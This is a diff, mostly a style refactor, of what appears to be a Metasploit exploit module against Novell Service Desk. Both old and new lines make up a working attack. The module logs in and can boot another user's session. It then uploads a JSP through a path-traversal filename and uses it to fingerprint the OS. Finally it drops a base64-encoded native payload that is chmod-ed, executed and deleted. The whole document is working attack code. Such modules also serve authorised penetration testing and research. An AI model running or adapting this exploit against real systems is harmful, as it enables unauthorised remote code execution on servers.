@@ -30,8 +30,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ],
           [ 'URL', 'https://seclists.org/bugtraq/2016/Apr/64' ]
         ],
-        'Platform' => %w{linux win},
-        'Arch' => ARCH_X86,
         'DefaultOptions' => { 'WfsDelay' => 15 },
         'Targets' => [
           [ 'Automatic', {} ],
@@ -80,12 +78,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri('LiveTime', 'WebObjects', 'LiveTime.woa'),
       'method' => 'GET',
       'headers' => {
-        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
       }
     })
 
-    if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/
-      return $1.to_f
+    if res && res.code == 200 && res.body.to_s =~ %r{<p class="login-version-title">\Version \#([0-9.]+)</p>}
+      return ::Regexp.last_match(1).to_f
     else
       return 999
     end
@@ -107,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("#{peer} - Determining target")
 
-    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    os_finder_payload = %{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
 
     traversal_paths = []
     if datastore['TRAVERSAL_PATH']
@@ -125,49 +123,49 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri('LiveTime', jsp_name),
         'method' => 'GET',
         'headers' => {
-          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
         },
         'cookie' => @cookies
       })
 
-      if res && res.code == 200
-        if res.body.to_s =~ /Windows/
-          @my_target = targets[2]
-        else
-          # Linux here
-          @my_target = targets[1]
-        end
-        if traversal_path.include? '/srv/tomcat6/webapps/'
-          register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
-        else
-          register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
-        end
-        return traversal_path
+      next unless res && res.code == 200
+
+      if res.body.to_s =~ /Windows/
+        @my_target = targets[2]
+      else
+        # Linux here
+        @my_target = targets[1]
       end
+      if traversal_path.include? '/srv/tomcat6/webapps/'
+        register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
+      else
+        register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
+      end
+      return traversal_path
     end
 
     return nil
   end
 
   def upload_jsp(traversal_path, jsp)
-    jsp_name = Rex::Text.rand_text_alpha(6 + rand(8)) + ".jsp"
+    jsp_name = Rex::Text.rand_text_alpha(rand(6..13)) + '.jsp'
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"")
+    post_data.add_part(jsp, 'application/octet-stream', 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"")
     data = post_data.to_s
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(@upload_url),
       'headers' => {
-        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
       },
       'cookie' => @cookies,
       'data' => data,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     })
 
-    if not res && res.code == 200
+    if !(res && res.code == 200)
       fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...")
     else
       return jsp_name
@@ -175,31 +173,31 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_jsp
-    opts = { :arch => @my_target.arch, :platform => @my_target.platform }
-    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
+    opts = { arch: @my_target.arch, platform: @my_target.platform }
+    exploit_regenerate_payload(@my_target.platform, @my_target.arch)
     exe = generate_payload_exe(opts)
     base64_exe = Rex::Text.encode_base64(exe)
 
-    native_payload_name = rand_text_alpha(rand(6) + 3)
+    native_payload_name = rand_text_alpha(rand(3..8))
     ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
 
-    var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
-    var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
-    var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
-    var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
-    var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
-    var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
-    var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3)
+    var_raw = Rex::Text.rand_text_alpha(rand(3..10))
+    var_ostream = Rex::Text.rand_text_alpha(rand(3..10))
+    var_buf = Rex::Text.rand_text_alpha(rand(3..10))
+    var_decoder = Rex::Text.rand_text_alpha(rand(3..10))
+    var_tmp = Rex::Text.rand_text_alpha(rand(3..10))
+    var_path = Rex::Text.rand_text_alpha(rand(3..10))
+    var_proc2 = Rex::Text.rand_text_alpha(rand(3..10))
 
     if @my_target['Platform'] == 'linux'
-      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      chmod = %Q|
+      var_proc1 = Rex::Text.rand_text_alpha(rand(3..10))
+      chmod = %|
       Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
       Thread.sleep(200);
       |
 
-      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
-      cleanup = %Q|
+      var_proc3 = Rex::Text.rand_text_alpha(rand(3..10))
+      cleanup = %|
       Thread.sleep(200);
       Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
       |
@@ -208,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       cleanup = ''
     end
 
-    jsp = %Q|
+    jsp = %|
     <%@page import="java.io.*"%>
     <%@page import="sun.misc.BASE64Decoder"%>
     <%
@@ -234,35 +232,35 @@ class MetasploitModule < Msf::Exploit::Remote
 
     jsp = jsp.gsub(/\n/, '')
     jsp = jsp.gsub(/\t/, '')
-    jsp = jsp.gsub(/\x0d\x0a/, "")
-    jsp = jsp.gsub(/\x0a/, "")
+    jsp = jsp.gsub(/\x0d\x0a/, '')
+    jsp = jsp.gsub(/\x0a/, '')
 
     return jsp
   end
 
   def exploit
-    version = get_version
+    get_version
 
     # 1: get the cookies, the login_url and the password_form and username form names (they varies between versions)
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'),
       'headers' => {
-        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
       }
     })
 
-    if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/
-      login_url = $2
+    if res && res.code == 200 && res.body.to_s =~ %r{class="login-form"(.*)action="([\w/.]+)(;jsessionid=)*}
+      login_url = ::Regexp.last_match(2)
       @cookies = res.get_cookies
-      if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/
-        password_form = $1
+      if res.body.to_s =~ %r{type="password" name="([\w.]+)" />}
+        password_form = ::Regexp.last_match(1)
       else
         # we shouldn't hit this condition at all, this is default for v7+
         password_form = 'password'
       end
-      if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/
-        username_form = $1
+      if res.body.to_s =~ %r{type="text" name="([\w.]+)" />}
+        username_form = ::Regexp.last_match(1)
       else
         # we shouldn't hit this condition at all, this is default for v7+
         username_form = 'username'
@@ -276,7 +274,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(login_url),
       'headers' => {
-        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
       },
       'cookie' => @cookies,
       'vars_post' => {
@@ -287,38 +285,36 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 &&
-       (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
-       res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/)   # v6.5
-      import_url = $1
-    else
+       (res.body.to_s =~ %r{id="clientListForm" action="([\w/.]+)">} || # v7 and above
+       res.body.to_s =~ %r{<form method="post" action="([\w/.]+)">}) # v6.5
+      import_url = ::Regexp.last_match(1)
+    elsif res && res.code == 200 && res.body.to_s =~ %r{class="login-form"(.*)action="([\w/.]+)(;jsessionid=)*} &&
+          res.body.to_s =~ /This account is in use on another system/
       # hmm either the password is wrong or someone else is using "our" account.. .
       # let's try to boot him out
-      if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ &&
-         res.body.to_s =~ /This account is in use on another system/
-
-        res = send_request_cgi({
-          'method' => 'POST',
-          'uri' => normalize_uri(login_url),
-          'headers' => {
-            'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
-          },
-          'cookie' => @cookies,
-          'vars_post' => {
-            username_form => datastore['USERNAME'],
-            password_form => datastore['PASSWORD'],
-            'ButtonLoginOverride' => 'Login'
-          }
-        })
-        if res && res.code == 200 &&
-           (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
-           res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/)   # v6.5
-          import_url = $1
-        else
-          fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
-        end
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(login_url),
+        'headers' => {
+          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
+        },
+        'cookie' => @cookies,
+        'vars_post' => {
+          username_form => datastore['USERNAME'],
+          password_form => datastore['PASSWORD'],
+          'ButtonLoginOverride' => 'Login'
+        }
+      })
+      if res && res.code == 200 &&
+         (res.body.to_s =~ %r{id="clientListForm" action="([\w/.]+)">} || # v7 and above
+         res.body.to_s =~ %r{<form method="post" action="([\w/.]+)">}) # v6.5
+        import_url = ::Regexp.last_match(1)
       else
         fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
       end
+
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
     end
 
     # 3: get the upload_url
@@ -326,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(import_url),
       'headers' => {
-        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
       },
       'cookie' => @cookies,
       'vars_post' => {
@@ -335,18 +331,18 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 &&
-       (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ ||                         # v7 and above
-       res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/) # v6.5
-      @upload_url = $1
+       (res.body.to_s =~ %r{id="clientImportUploadForm" action="([\w/.]+)">} || # v7 and above
+       res.body.to_s =~ %r{<form method="post" enctype="multipart/form-data" action="([\w/.]+)">}) # v6.5
+      @upload_url = ::Regexp.last_match(1)
     else
       fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.")
     end
 
-    if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/
-      @upload_form = $1
+    if res.body.to_s =~ %r{<input type="file" name="([0-9.]+)" />}
+      @upload_form = ::Regexp.last_match(1)
     else
       # go with the default for 7.1.0, might not work with other versions...
-      @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"
+      @upload_form = '0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23'
     end
 
     # 4: target selection
